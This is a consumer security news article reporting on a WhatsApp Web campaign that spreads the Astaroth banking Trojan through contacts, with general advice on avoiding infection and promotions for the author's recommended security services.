WhatsApp Web Malware Automatically Spreads Banking Trojan
NEWNow you can listen to News articles!
A new malware campaign is weaponizing WhatsApp Web. Security researchers say a banking Trojan linked to Astaroth is now spreading automatically via chat messages, making the attack harder to stop once it starts.
The campaign is known as Boto Cor-de-Rosa. It shows how cybercriminals continue to evolve, especially when they can abuse tools that people rely on every day. This attack targets Windows users and uses WhatsApp Web as a delivery system and engine that further spreads the infection.
Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered right to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join me CYBERGUY.COM information sheet.
BROWSER EXTENSION MALWARE INFECTED 8.8M USERS IN DARKSPECTER ATTACK
Attackers abuse WhatsApp Web to spread malware through messages that appear to come from people they trust. (Kurt “CyberGuy” Knutsson)
How this web attack on WhatsApp works
The attack begins with a simple message. A contact sends what looks like a routine ZIP file via WhatsApp. The file name appears random and harmless, which reduces suspicion. Once opened, the ZIP contains a Visual Basic script disguised as a normal document. If the user executes it, the script silently introduces two more pieces of malware. The script then downloads the Astaroth banking malware written in Delphi. It also installs a Python-based module designed to control WhatsApp Web. Both components run in the background without obvious warning signs. From there, the infection becomes self-sustaining.
Malware that spreads through your contacts
What makes this campaign especially dangerous is how it spreads. The Python module scans the victim’s WhatsApp contacts and automatically sends the malicious ZIP file to each conversation. Acronis researchers discovered that the malware adapts its messages depending on the time of day. Send friendly greetings, making the message seem normal and familiar. The text says: “Here is the requested file. If you have any questions, I am available!” Because the message appears to come from someone you know, many people open it without hesitation.
NEW MALWARE CAN READ YOUR CHATS AND STEAL YOUR MONEY
A single ZIP file sent via chat can silently install banking malware and begin spreading to all contacts. (Kurt “CyberGuy” Knutsson)
Integrated tracking keeps the attack efficient
This malware is carefully designed to monitor its own performance in real time. The propagation tool tracks how many messages are successfully delivered, how many are not delivered, and the overall sending speed measured per minute. After every 50 messages, it generates progress updates showing how many contacts have been reached. This feedback allows attackers to measure success quickly and make adjustments if something stops working.
What happens after infection?
The initial script is heavily obfuscated to avoid detection by antivirus tools. Once executed, it launches PowerShell commands that download more malware from compromised websites. A well-known domain used in this campaign is coffe-estilo.com. The malware is installed inside a folder that mimics a Microsoft Edge cache directory. Inside are libraries and executable files that make up Astaroth’s entire banking payload. From there, malware can steal credentials, monitor activity, and potentially access financial accounts.
Why WhatsApp Web is abused
WhatsApp Web is popular because it mirrors your phone conversations on a computer. That convenience makes it easier to send messages, share files, and write faster, but it also introduces risks. When you use WhatsApp Web, you link your phone to a browser by scanning a QR code at web.whatsapp.com. Once connected, that browser session becomes a trusted extension of your account. Your chats appear on the screen, the messages you send come from your real number, and incoming messages are synced across both devices.
That configuration is exactly what attackers take advantage of. If the malware gains access to a computer with WhatsApp Web connected, it can act as the user. You can read messages, access contact lists, and send files or links that look completely legitimate. The messages do not raise alarms because they come from a real account, not a fake one.
This is what makes WhatsApp Web an effective malware distribution system. Instead of breaking into WhatsApp, attackers simply abuse an open browser session to automatically spread malicious files. Many users do not realize the danger because WhatsApp Web seems harmless. They are often left logged in on work computers, shared devices, or systems without strong security. In those situations, malware doesn’t need advanced tricks. You only need access to a session that is already trusted. That combination of convenience and trust is why WhatsApp Web has become such an attractive target.
MALICIOUS MAC EXTENSIONS STEAL WALLETS AND CRYPTO PASSWORDS
Once WhatsApp Web is compromised, the malware can act as the user, sending messages and files that appear completely legitimate. (Kurt “CyberGuy” Knutsson)
How to stay safe from WhatsApp web malware
Attacks like this WhatsApp web malware are designed to spread quickly through trusted conversations. Some smart habits can dramatically reduce your risk.
1) Be skeptical of unexpected attachments
Messaging apps seem casual, and that’s exactly why attackers use them. Never open ZIP files sent via chat unless you first confirm with the sender. Be on the lookout for file names made up of random numbers or unknown names. Treat messages that create urgency or feel too familiar as a warning sign. If a file arrives out of nowhere, pause before clicking.
2) Block web access to WhatsApp
This campaign abuses WhatsApp Web to spread automatically once a device is infected. Check active WhatsApp Web sessions and log out of those you don’t recognize. Avoid leaving your session logged into WhatsApp Web on public or shared computers. Allow two-factor authentication (2FA) within WhatsApp settings. Cutting off access to the Web helps limit the distance malware can travel.
3) Keep your Windows PC locked and use strong antivirus software
This type of malware takes advantage of systems that are late in updating. Install Windows updates as soon as they are available. Also, keep your web browser fully updated. Staying up to date closes many of the doors that attackers try to break through. Additionally, use powerful antivirus software that watches for script abuse and PowerShell activity in real time.
The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.
Get my picks for the best antivirus protection winners of 2026 for your Windows, Mac, Android, and iOS devices at Cyberguy.com.
4) Limit the amount of your personal data that is online
Banking malware is often accompanied by identity theft and financial fraud. One way to reduce the consequences is to reduce your digital footprint. A data removal service can help remove your personal information from the data broker sites that attackers often target. With less information available, criminals have fewer details to exploit if malware reaches your device.
While no service can guarantee complete removal of your data from the Internet, a data deletion service is truly a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leak data with information they can find on the dark web, making it harder for them to target you.
Check out my top picks for data removal services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com.
Get a free scan to find out if your personal information is already available on the web: Cyberguy.com
5) Add identity theft protection for additional coverage
Even with strong security habits, financial tracking adds another layer of protection. An identity theft protection service can detect suspicious activity related to your credit and personal data. Identity theft companies can monitor personal information such as your Social Security number (SSN), phone number, and email address, and alert you if it is sold on the dark web or used to open an account. They can also help you freeze your bank and credit card accounts to prevent further unauthorized use by criminals.
You should also turn on alerts for banking and credit card transactions so you’re quickly notified if something seems wrong. The less exposed your data is, the less opportunity attackers have to cause damage.
See my tips and best options on how to protect yourself from identity theft at Cyberguy.com.
6) Slow down and trust your instincts
Most malware infections occur because people act too quickly. If a message doesn’t feel right to you, trust that instinct. Familiar names and friendly language can lower your guard, but they should never replace caution. Take a moment to verify the message or file before opening anything. Attackers depend on trust and urgency to succeed. Slowing down takes away their advantage.
Kurt’s Key Takeaways
This malware campaign on WhatsApp Web is a reminder that cyberattacks no longer rely on obvious red flags. Instead, they integrate into everyday conversations and use familiar tools to spread silently and quickly. What makes this threat especially concerning is how little effort it requires to move from one device to dozens of others. A single click can turn a trusted chat into a distribution system for banking malware and identity theft. The good news is that small changes make a big difference. Pay attention to attachments, block web access to WhatsApp, keep devices updated and reduce Going slow before clicking can stop these attacks in their tracks. As messaging platforms continue to play an increasingly important role in daily life, staying alert is no longer optional. Awareness and simple habits are still some of the strongest defenses you have.
Do you think messaging apps are doing enough to protect users from malware that spreads through trusted conversations? Let us know by writing to us at Cyberguy.com.
CLICK HERE TO DOWNLOAD THE News APP
Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered right to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join me CYBERGUY.COM information sheet.
Copyright 2026 CyberGuy.com. All rights reserved.
Kurt “CyberGuy” Knutsson is an award-winning technology journalist with a deep love for technology, gear and devices that improve lives with his contributions to News and News Business since mornings on “News & Friends.” Do you have any technical questions? Get Kurt’s free CyberGuy newsletter, share your voice, a story idea or comment on CyberGuy.com.